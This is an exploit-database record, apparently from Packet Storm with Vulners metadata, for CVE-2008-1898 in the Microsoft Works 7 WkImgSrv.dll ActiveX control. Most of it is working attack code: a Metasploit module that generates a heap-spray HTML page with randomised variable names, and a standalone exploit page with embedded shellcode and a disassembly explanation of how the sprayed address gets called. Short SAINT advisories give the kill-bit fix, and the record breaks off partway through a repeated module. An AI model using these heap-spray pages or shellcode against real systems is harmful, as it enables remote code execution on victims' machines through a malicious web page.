Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
2009-11-26T00:00:00
ID PACKETSTORM:83163 Type packetstorm Reporter dean Modified 2009-11-26T00:00:00
Description
`###
## This file is part of the Metasploit Framework and may be subject to
## redistribution and commercial restrictions. Please see the Metasploit
## Framework web site for more information on licensing and terms of use.
## http://metasploit.com/framework/
###
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit',
'Description' => %q{
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker
to execute arbitrary code on a system. By passing a negative integer to the
WksPictureInterface method, an attacker could execute arbitrary code on the system
with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.
This control is not marked safe for scripting, please choose your attack vector carefully.
},
'License' => MSF_LICENSE,
'Author' => [ 'dean <dean [at] zerodaysolutions [dot] com>' ],
'Version' => '$Revision',
'References' =>
[
[ 'CVE','2008-1898' ],
[ 'OSVDB', '44458'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Nov 28 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']),
], self.class)
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return.
ret = Rex::Text.to_unescape([target.ret].pack('L'))
# Randomize the javascript variable names.
vname = rand_text_alpha(rand(10) + 1)
var_i = rand_text_alpha(rand(10) + 1)
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
content = %Q|
<html>
<object id='#{vname}' classid='clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6'></object>
<body>
<script language="JavaScript">
var #{rand1} = unescape('#{shellcode}');
var #{rand2} = unescape('#{ret}');
var #{rand3} = 20;
var #{rand4} = #{rand3} + #{rand1}.length;
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
var #{rand5} = #{rand2}.substring(0,#{rand4});
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
while (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
var #{rand7} = new Array();
for (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
#{vname}.WksPictureInterface = 168430090;
</script>
</body>
</html>
|
print_status("Creating HTML file ...")
file_create(content)
end
end
`
{"type": "packetstorm", "published": "2009-11-26T00:00:00", "reporter": "dean", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "5e22e64a4517923de5d502a7d6ae5cbd"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "c1c74f9a735ac396c687b86aa7ceb427"}, {"key": "modified", "hash": "6575b9975f41c19a0b91d246678e437c"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "6575b9975f41c19a0b91d246678e437c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "48767461cb09465362c687ae0c44753b"}, {"key": "sourceData", "hash": "c94fa2a7c53ca6934cf1205b4baa640c"}, {"key": "sourceHref", "hash": "419b2c382ec0ff83ccacb01c2c7cecc8"}, {"key": "title", "hash": "a555d482b7dd634ae475e16eea1546f3"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit', \n'Description' => %q{ \nThe Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker \nto execute arbitrary code on a system. By passing a negative integer to the \nWksPictureInterface method, an attacker could execute arbitrary code on the system \nwith privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. \nThis control is not marked safe for scripting, please choose your attack vector carefully. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'dean <dean [at] zerodaysolutions [dot] com>' ], \n'Version' => '$Revision', \n'References' => \n[ \n[ 'CVE','2008-1898' ], \n[ 'OSVDB', '44458'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ] \n], \n'DisclosureDate' => 'Nov 28 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.html']), \n], self.class) \nend \n \ndef exploit \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Set the return. \nret = Rex::Text.to_unescape([target.ret].pack('L')) \n \n# Randomize the javascript variable names. \nvname = rand_text_alpha(rand(10) + 1) \nvar_i = rand_text_alpha(rand(10) + 1) \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \n \ncontent = %Q| \n<html> \n<object id='#{vname}' classid='clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6'></object> \n<body> \n<script language=\"JavaScript\"> \nvar #{rand1} = unescape('#{shellcode}'); \nvar #{rand2} = unescape('#{ret}'); \nvar #{rand3} = 20; \nvar #{rand4} = #{rand3} + #{rand1}.length; \nwhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2}; \nvar #{rand5} = #{rand2}.substring(0,#{rand4}); \nvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4}); \nwhile (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5}; \nvar #{rand7} = new Array(); \nfor (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} } \n#{vname}.WksPictureInterface = 168430090; \n</script> \n</body> \n</html> \n| \n \nprint_status(\"Creating HTML file ...\") \n \nfile_create(content) \nend \n \nend \n`\n", "viewCount": 3, "history": [], "lastseen": "2016-12-05T22:22:28", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/83163/Microsoft-Works-7-WkImgSrv.dll-WKsPictureInterface-ActiveX-Exploit.html", "sourceHref": "https://packetstormsecurity.com/files/download/83163/msworks_wkspictureinterface.rb.txt", "title": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit", "enchantments": {"score": {"vector": "NONE", "value": 9.3}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-1898"]}, {"type": "saint", "idList": ["SAINT:BFF9824195242A17582401DB6500A612", "SAINT:AB7288B0CA2D2B7EC753618C8151CD10", "SAINT:8C935019A27896D43FD0038C30F94CF1"]}, {"type": "exploitdb", "idList": ["EDB-ID:5460", "EDB-ID:5530", "EDB-ID:16649"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MSWORKS_WKSPICTUREINTERFACE"]}, {"type": "d2", "idList": ["D2SEC_WORKS7"]}], "modified": "2016-12-05T22:22:28"}, "vulnersScore": 9.3}, "references": [], "cvelist": ["CVE-2008-1898"], "hash": "d72a97a473e3ebafd922dc092abf76f284bd8cf024c77bffa43f48d946eb4229", "edition": 1, "id": "PACKETSTORM:83163", "modified": "2009-11-26T00:00:00", "description": ""}
{"cve": [{"lastseen": "2018-10-12T11:33:46", "bulletinFamily": "NVD", "description": "A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call.", "modified": "2018-10-11T16:37:50", "published": "2008-04-21T13:05:00", "id": "CVE-2008-1898", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1898", "title": "CVE-2008-1898", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 01/08/2009 \nCVE: [CVE-2008-1898](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1898>) \nBID: [28820](<http://www.securityfocus.com/bid/28820>) \nOSVDB: [44458](<http://www.osvdb.org/44458>) \n\n\n### Background\n\n[Microsoft Works](<http://www.microsoft.com/products/works>) is a suite of productivity tools for home users. \n\n### Problem\n\nThe WkImgSrv.dll ActiveX control included in Microsoft Works allows command execution when a user loads a web page which instantiates the control with an invalid WksPictureInterface property value. \n\n### Resolution\n\nSet the kill bit on class ID 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 as described in [Microsoft support article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.milw0rm.com/exploits/5460> \n\n\n### Limitations\n\nExploit works on Microsoft Works 7 and requires a user to load the exploit page in Internet Explorer. \n\nInternet Explorer on the target machine must treat the script server's host address as in the Local intranet zone or in the Trusted sites zone, and the option _Initialize and script ActiveX controls not marked as safe_ must be set to _Enable_ or _Prompt_, because the affected ActiveX control is not marked safe for scripting. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-01-08T00:00:00", "published": "2009-01-08T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_works_wkimgsrv", "id": "SAINT:BFF9824195242A17582401DB6500A612", "title": "Microsoft Works WkImgSrv.dll ActiveX Control WksPictureInterface vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:18", "bulletinFamily": "exploit", "description": "Added: 01/08/2009 \nCVE: [CVE-2008-1898](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1898>) \nBID: [28820](<http://www.securityfocus.com/bid/28820>) \nOSVDB: [44458](<http://www.osvdb.org/44458>) \n\n\n### Background\n\n[Microsoft Works](<http://www.microsoft.com/products/works>) is a suite of productivity tools for home users. \n\n### Problem\n\nThe WkImgSrv.dll ActiveX control included in Microsoft Works allows command execution when a user loads a web page which instantiates the control with an invalid WksPictureInterface property value. \n\n### Resolution\n\nSet the kill bit on class ID 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 as described in [Microsoft support article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.milw0rm.com/exploits/5460> \n\n\n### Limitations\n\nExploit works on Microsoft Works 7 and requires a user to load the exploit page in Internet Explorer. \n\nInternet Explorer on the target machine must treat the script server's host address as in the Local intranet zone or in the Trusted sites zone, and the option _Initialize and script ActiveX controls not marked as safe_ must be set to _Enable_ or _Prompt_, because the affected ActiveX control is not marked safe for scripting. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-01-08T00:00:00", "published": "2009-01-08T00:00:00", "id": "SAINT:AB7288B0CA2D2B7EC753618C8151CD10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_works_wkimgsrv", "title": "Microsoft Works WkImgSrv.dll ActiveX Control WksPictureInterface vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "description": "Added: 01/08/2009 \nCVE: [CVE-2008-1898](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1898>) \nBID: [28820](<http://www.securityfocus.com/bid/28820>) \nOSVDB: [44458](<http://www.osvdb.org/44458>) \n\n\n### Background\n\n[Microsoft Works](<http://www.microsoft.com/products/works>) is a suite of productivity tools for home users. \n\n### Problem\n\nThe WkImgSrv.dll ActiveX control included in Microsoft Works allows command execution when a user loads a web page which instantiates the control with an invalid WksPictureInterface property value. \n\n### Resolution\n\nSet the kill bit on class ID 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 as described in [Microsoft support article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.milw0rm.com/exploits/5460> \n\n\n### Limitations\n\nExploit works on Microsoft Works 7 and requires a user to load the exploit page in Internet Explorer. \n\nInternet Explorer on the target machine must treat the script server's host address as in the Local intranet zone or in the Trusted sites zone, and the option _Initialize and script ActiveX controls not marked as safe_ must be set to _Enable_ or _Prompt_, because the affected ActiveX control is not marked safe for scripting. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2009-01-08T00:00:00", "published": "2009-01-08T00:00:00", "id": "SAINT:8C935019A27896D43FD0038C30F94CF1", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/microsoft_works_wkimgsrv", "type": "saint", "title": "Microsoft Works WkImgSrv.dll ActiveX Control WksPictureInterface vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T23:09:08", "bulletinFamily": "exploit", "description": "Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC. CVE-2008-1898. Dos exploit for windows platform", "modified": "2008-04-17T00:00:00", "published": "2008-04-17T00:00:00", "id": "EDB-ID:5460", "href": "https://www.exploit-db.com/exploits/5460/", "type": "exploitdb", "title": "Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC", "sourceData": "<html>\n<head>\n <title>Microsoft Works 7 WkImgSrv.dll crash POC</title>\n <script language=\"JavaScript\">\n function payload() {\nvar num = -1;\nobj.WksPictureInterface = num;\n }\n </script>\n</head>\n <body onload=\"JavaScript: return payload();\">\n<object classid=\"clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6\" id=\"obj\">\n</object>\n </body>\n</html>\n\n# milw0rm.com [2008-04-17]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5460/"}, {"lastseen": "2016-01-31T22:14:53", "bulletinFamily": "exploit", "description": "Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit. CVE-2008-1898. Remote exploit for windows platform", "modified": "2008-05-02T00:00:00", "published": "2008-05-02T00:00:00", "id": "EDB-ID:5530", "href": "https://www.exploit-db.com/exploits/5530/", "type": "exploitdb", "title": "Microsoft Works 7 WkImgSrv.dll ActiveX Remote BoF Exploit", "sourceData": "<!--\nThe problem is in wkimgsrv.dll module shipped with many MS Offiice\nSuite (tested on MS OF 2003,MS OF 2007)\nActually,this is not the case of buffer overflow attack,just a exploit\nof insecure method WKsPictureInterface.\nSetting this point to any where in memory and IE will crash when\nwkiimgsrv's trying to access an invalid memory location.\n\nLet's get into detail :\n\n00D473BD PUSH EBP ;\nBegin of Set WksPictureInterface method\n00D473BE \t MOV EBP,ESP\n00D473C0 SUB ESP,1C\n00D473C3 \tMOV EAX,DWORD PTR SS:[EBP+C] ; Move paramater to EAX\n00D473C6 \tPUSH ESI\n00D473C7 \tTEST EAX,EAX ; Checking whether\nEAX is NULL\n00D473C9 \tJNZ SHORT wkimgsrv.00D473D5 ; OK,if it is not null continue\n00D473CB \tMOV EAX,80004005\t ;\t\n00D473D0 \tJMP wkimgsrv.00D47456 ;No,it's is NULL,exit method\n00D473D5 ==>\tMOV ESI,DWORD PTR SS:[EBP+8] ; Do some other stuffs, we don't care\n00D473D8 \tLEA EDX,DWORD PTR SS:[EBP-1C] ;\n00D473DB \tPUSH EDX\n00D473DC \tPUSH EAX\n00D473DD \tMOV DWORD PTR DS:[ESI+2A0],EAX ; =============\n00D473E3 ==>\tMOV ECX,DWORD PTR DS:[EAX] ; Here is the\nproblem,the data stored by EAX is referenced and moved into ECX\n00D473E5 \tCALL DWORD PTR DS:[ECX+30] ;Next the address\nin some struct pointed by ECX is called\n\nNow if we're able to setup memory satisfied :\nCreate a struct in memory where the first DWORD in the struct point to\nitself and the DWORD at offset 0x30 from struct address is point to\nour shellcode.\nWe should be able to exploit this vulnerability.\nThis seem to be nightmare because there is nothing to inject except an\ninteger as paramater for the method.\nFortunately we have prefered heapspray method\nHowerver we can't spray with nop (0x90 ) anymore(if this happens, all\naddress will be 90909090 which is invalid address) ,\nThe addresses and byte to spray must comply some restrictions\n- Byte to spray must be single byte length instruction (or somewhat\nthat not change execution of the program or causing exception)\n- Combination of 4 byte must refer to valid memory address which will\npoint to it self.\n\nI have chosen 0x0A to spay on IE 7, and 0x05 to spay on IE 6. In\nInternet Explorer 7 the number passes to method is 168430090 which is\n0x0A0A0A0A in\nhexa mode.Let's assume that we has fill 0x0A into memory at\n0x0A0A0A0A. EAX will hold value of 0x0A0A0A0A.\nMov ECX,DWORD PTR DS:[EAX] ;=> ECX= 0x0A0A0A0A\nCALL DWORD DTR DS:[ECX+30] ;=> CALL DWORD DTR:[0x0A0A0A3A] => CALL 0x0A0A0A0A\nMemory at 0x0A0A0A0A is filled with 0x0A ~ instruction is OR CL,BYTE\nPTR DS:[EDX]\nFortunately this hadn't caused exception and not changed execution\npath of our shellcode\n\nShellcode should be executed as expected(calc will be opened).\n-->\n\n<html>\n<head>\n<title>Microsoft Works 7 WkImgSrv.dll Exploit</title>\n\nCoded by lhoang8500\nlhoang8500[at]gmail[dot]com\n BKIS Center - Vietnam\n\n<SCRIPT language=\"javascript\">\n\n\tvar heapSprayToAddress = 0x0A0A0A0A;\n\n\tvar payLoadCode =\nunescape(\"%u9090%u9090%u9090%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063\");\n\n\tvar heapBlockSize = 0x400000;\n\n\tvar payLoadSize = payLoadCode.length * 2;\n\n\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n\n\tvar spraySlide = unescape(\"%u0A0A%u0A0A\");\n\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\n\n\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\n\n\tmemory = new Array();\n\n\tfor (i=0;i<heapBlocks;i++)\n\t{\n\t\tmemory[i] = spraySlide + payLoadCode;\n\t}\n\n\n\n\tfunction getSpraySlide(spraySlide, spraySlideSize)\n\t{\n\t\twhile (spraySlide.length*2<spraySlideSize)\n\t\t{\n\t\t\tspraySlide += spraySlide;\n\t\t}\n\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\t\treturn spraySlide;\n\t}\n\n</script>\n <script language=\"JavaScript\">\n function payload() {\nvar num = 168430090;\nobj.WksPictureInterface = num;\n }\n </script>\n</head>\n <body onload=\"JavaScript: return payload();\">\n<object classid=\"clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6\" id=\"obj\">\n</object>\n </body>\n</html>\n\n# milw0rm.com [2008-05-02]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5530/"}, {"lastseen": "2016-02-02T06:10:19", "bulletinFamily": "exploit", "description": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit. CVE-2008-1898. Remote exploit for windows platform", "modified": "2010-09-25T00:00:00", "published": "2010-09-25T00:00:00", "id": "EDB-ID:16649", "href": "https://www.exploit-db.com/exploits/16649/", "type": "exploitdb", "title": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface ActiveX Exploit", "sourceData": "##\r\n# $Id: msworks_wkspictureinterface.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = LowRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThe Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\r\n\t\t\t\tto execute arbitrary code on a system. By passing a negative integer to the\r\n\t\t\t\tWksPictureInterface method, an attacker could execute arbitrary code on the system\r\n\t\t\t\twith privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\r\n\t\t\t\tThis control is not marked safe for scripting, please choose your attack vector carefully.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'dean <dean [at] zerodaysolutions [dot] com>' ],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE','2008-1898' ],\r\n\t\t\t\t\t[ 'OSVDB', '44458'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 28 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.html']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Set the return.\r\n\t\tret = Rex::Text.to_unescape([target.ret].pack('L'))\r\n\r\n\t\t# Randomize the javascript variable names.\r\n\t\tvname = rand_text_alpha(rand(10) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(10) + 1)\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tcontent = %Q|\r\n<html>\r\n<object id='#{vname}' classid='clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6'></object>\r\n<body>\r\n<script language=\"JavaScript\">\r\nvar #{rand1} = unescape('#{shellcode}');\r\nvar #{rand2} = unescape('#{ret}');\r\nvar #{rand3} = 20;\r\nvar #{rand4} = #{rand3} + #{rand1}.length;\r\nwhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};\r\nvar #{rand5} = #{rand2}.substring(0,#{rand4});\r\nvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});\r\nwhile (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};\r\nvar #{rand7} = new Array();\r\nfor (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }\r\n#{vname}.WksPictureInterface = 168430090;\r\n</script>\r\n</body>\r\n</html>\r\n|\r\n\r\n\t\tprint_status(\"Creating HTML file ...\")\r\n\r\n\t\tfile_create(content)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16649/"}], "d2": [{"lastseen": "2016-09-25T14:11:03", "bulletinFamily": "exploit", "description": "**Name**| d2sec_works7 \n---|--- \n**CVE**| CVE-2008-1898 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Microsoft Works 7 WkImgSrv.dll ActiveX Remote Code Execution Vulnerability \n**Notes**| \n", "modified": "2008-04-21T13:05:00", "published": "2008-04-21T13:05:00", "id": "D2SEC_WORKS7", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_works7", "title": "DSquare Exploit Pack: D2SEC_WORKS7", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-03-15T02:59:27", "bulletinFamily": "exploit", "description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. This control is not marked safe for scripting, please choose your attack vector carefully.", "modified": "2017-07-24T13:26:21", "published": "2009-01-05T00:55:29", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MSWORKS_WKSPICTUREINTERFACE", "href": "", "type": "metasploit", "title": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = LowRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution',\n 'Description' => %q{\n The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'dean <dean[at]zerodaysolutions.com>' ],\n 'References' =>\n [\n [ 'CVE','2008-1898' ],\n [ 'OSVDB', '44458'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => 'true',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2-SP3 IE 7.0', { 'Ret' => 0x0A0A0A0A } ]\n ],\n 'DisclosureDate' => 'Nov 28 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.html']),\n ])\n end\n\n def exploit\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Set the return.\n ret = Rex::Text.to_unescape([target.ret].pack('L'))\n\n # Randomize the javascript variable names.\n vname = rand_text_alpha(rand(10) + 1)\n var_i = 